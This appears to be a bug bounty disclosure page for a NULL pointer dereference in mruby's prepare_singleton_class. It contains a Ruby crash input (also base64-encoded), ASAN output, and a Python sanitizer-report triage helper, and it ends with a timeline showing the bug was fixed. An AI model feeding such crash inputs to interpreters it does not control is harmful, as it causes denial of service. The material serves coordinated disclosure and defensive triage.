NULL Pointer Dereference in mruby/mruby

Valid

Reported on

Jan 14th 2022


Description

There is a NULL Pointer Dereference in prepare_singleton_class (src/class.c:360:13). This bug was found on the latest mruby commit at the time of reporting (hash 171d32c0071d776207174a40a8fa26def3dbb931) on Ubuntu 20.04 for x86_64/amd64.

Proof of Concept

1.times{b={}
a=0
[**0,m:0]
c={0=>0,nil=>nil}[0]
def m()end
def c.e()end}

Steps to reproduce

1- Clone the repo and build with ASAN using: MRUBY_CONFIG=build_config/clang-asan.rb rake

2- Use mruby to execute the poc:

$ echo -ne "MS50aW1lc3tiPXt9CmE9MApbKiowLG06MF0KYz17MD0+MCxuaWw9Pm5pbH1bMF0KZGVmIG0oKWVuZApkZWYgYy5lKCllbmR9Cg==" | base64 -d > poc
$ build/host/bin/mruby ./poc
/home/octa/mruby/src/class.c:360:13: runtime error: member access within null pointer of type 'struct RClass'
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/octa/mruby/src/class.c:360:13 in 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==31695==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x0000005270f8 bp 0x7ffec6a14090 sp 0x7ffec6a13d80 T0)
==31695==The signal is caused by a READ memory access.
==31695==Hint: address points to the zero page.
    #0 0x5270f8 in prepare_singleton_class /home/octa/mruby/src/class.c:360:13
    #1 0x52688f in mrb_singleton_class_ptr /home/octa/mruby/src/class.c:1685:3
    #2 0x528785 in mrb_singleton_class /home/octa/mruby/src/class.c:1692:22
    #3 0x600757 in mrb_vm_exec /home/octa/mruby/src/vm.c:2918:17
    #4 0x566ee9 in mrb_vm_run /home/octa/mruby/src/vm.c:1128:12
    #5 0x55c339 in mrb_top_run /home/octa/mruby/src/vm.c:3050:12
    #6 0x88b6ce in mrb_load_exec /home/octa/mruby/mrbgems/mruby-compiler/core/parse.y:6882:7
    #7 0x88d2dc in mrb_load_detect_file_cxt /home/octa/mruby/mrbgems/mruby-compiler/core/parse.y:6925:12
    #8 0x4c9118 in main /home/octa/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347:11
    #9 0x7f46ef9450b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #10 0x41d82d in _start (/home/octa/mruby/build/host/bin/mruby+0x41d82d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/octa/mruby/src/class.c:360:13 in prepare_singleton_class
==31695==ABORTING
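As an added triage example (not part of the original report and not mruby code), the Python below parses the sanitizer output quoted above into a stable crash signature and checks that the base64 PoC from the reproduction steps decodes to the plain-text PoC shown earlier. The sample report text is copied from this page; the zero-page heuristic (a fault address below 4096 means a NULL base pointer plus a struct member offset, here 0x10) and the bucket key format are this example's own assumptions.

```python
"""Triage helper for sanitizer crash reports (added example, not mruby code)."""
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Excerpt of the sanitizer output quoted in the advisory above (sample input
# for this example; lines are copied from the report, truncated after frame #3).
SAMPLE_REPORT = """\
/home/octa/mruby/src/class.c:360:13: runtime error: member access within null pointer of type 'struct RClass'
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/octa/mruby/src/class.c:360:13 in 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==31695==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x0000005270f8 bp 0x7ffec6a14090 sp 0x7ffec6a13d80 T0)
==31695==The signal is caused by a READ memory access.
==31695==Hint: address points to the zero page.
    #0 0x5270f8 in prepare_singleton_class /home/octa/mruby/src/class.c:360:13
    #1 0x52688f in mrb_singleton_class_ptr /home/octa/mruby/src/class.c:1685:3
    #2 0x528785 in mrb_singleton_class /home/octa/mruby/src/class.c:1692:22
    #3 0x600757 in mrb_vm_exec /home/octa/mruby/src/vm.c:2918:17
"""

# Base64 PoC exactly as given in "Steps to reproduce".
POC_B64 = "MS50aW1lc3tiPXt9CmE9MApbKiowLG06MF0KYz17MD0+MCxuaWw9Pm5pbH1bMF0KZGVmIG0oKWVuZApkZWYgYy5lKCllbmR9Cg=="

# Assumption: faults below one page almost always mean a NULL base pointer,
# with the fault address being the offset of the member that was accessed.
PAGE_SIZE = 4096

UBSAN_RE = re.compile(r"^(?P<loc>[^\s:]+:\d+:\d+): runtime error: (?P<msg>.+)$", re.M)
ASAN_RE = re.compile(r"^==\d+==ERROR: AddressSanitizer: (?P<kind>\S+) on unknown address 0x(?P<addr>[0-9a-fA-F]+)", re.M)
ACCESS_RE = re.compile(r"^==\d+==The signal is caused by a (?P<access>READ|WRITE) memory access", re.M)
FRAME_RE = re.compile(r"^\s*#(?P<n>\d+) 0x[0-9a-fA-F]+ in (?P<func>\S+) (?P<loc>\S+)", re.M)


@dataclass
class CrashSignature:
    kind: str                     # e.g. "SEGV"
    access: Optional[str]         # "READ" / "WRITE" when the report says so
    fault_address: int
    top_func: str                 # function in frame #0
    top_loc: str                  # file:line:col of frame #0
    ubsan_msg: Optional[str]      # UBSan message for the same site, if present
    null_deref: bool              # fault address lies in the zero page
    member_offset: Optional[int]  # fault address itself when a NULL base is implied

    def bucket(self) -> str:
        """Stable key for de-duplicating crashes: kind, top function, file:line (no column/pc)."""
        file_line = ":".join(self.top_loc.split(":")[:2])
        return f"{self.kind}:{self.top_func}:{file_line}"


def parse_sanitizer_report(text: str) -> CrashSignature:
    """Extract a crash signature from combined UBSan/ASan output."""
    asan = ASAN_RE.search(text)
    if asan is None:
        raise ValueError("no AddressSanitizer ERROR line found")
    frames = FRAME_RE.findall(text)  # list of (n, func, loc) tuples, frame #0 first
    if not frames:
        raise ValueError("no stack frames found")
    _, top_func, top_loc = frames[0]
    access = ACCESS_RE.search(text)
    ubsan = UBSAN_RE.search(text)
    addr = int(asan.group("addr"), 16)
    null_deref = addr < PAGE_SIZE
    return CrashSignature(
        kind=asan.group("kind"),
        access=access.group("access") if access else None,
        fault_address=addr,
        top_func=top_func,
        top_loc=top_loc,
        ubsan_msg=ubsan.group("msg") if ubsan else None,
        null_deref=null_deref,
        member_offset=addr if null_deref else None,
    )


def decode_poc(b64: str) -> str:
    """Decode the PoC strictly (reject stray characters) and require plain ASCII text."""
    return base64.b64decode(b64, validate=True).decode("ascii")


if __name__ == "__main__":
    sig = parse_sanitizer_report(SAMPLE_REPORT)
    print(sig.bucket())
    print(f"NULL deref: {sig.null_deref}, member offset 0x{sig.member_offset:x}, access {sig.access}")
    print(decode_poc(POC_B64))
```

The bucket key drops the column and program counter on purpose: the same bug rebuilt with a different compiler or flags will move the pc and often the column, but the function and line stay stable, which is what you want when grouping a fuzzing corpus against this fix.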

Acknowledgements

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

We are processing your report and will contact the mruby team within 24 hours. 4 months ago
We have contacted a member of the mruby team and are waiting to hear back 4 months ago
Yukihiro "Matz" Matsumoto validated this vulnerability 4 months ago
Octavio Gianatiempo has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on 31fa33 4 months ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
Octavio (Researcher), 4 months ago:

Thanks for the quick validation and fix 👍
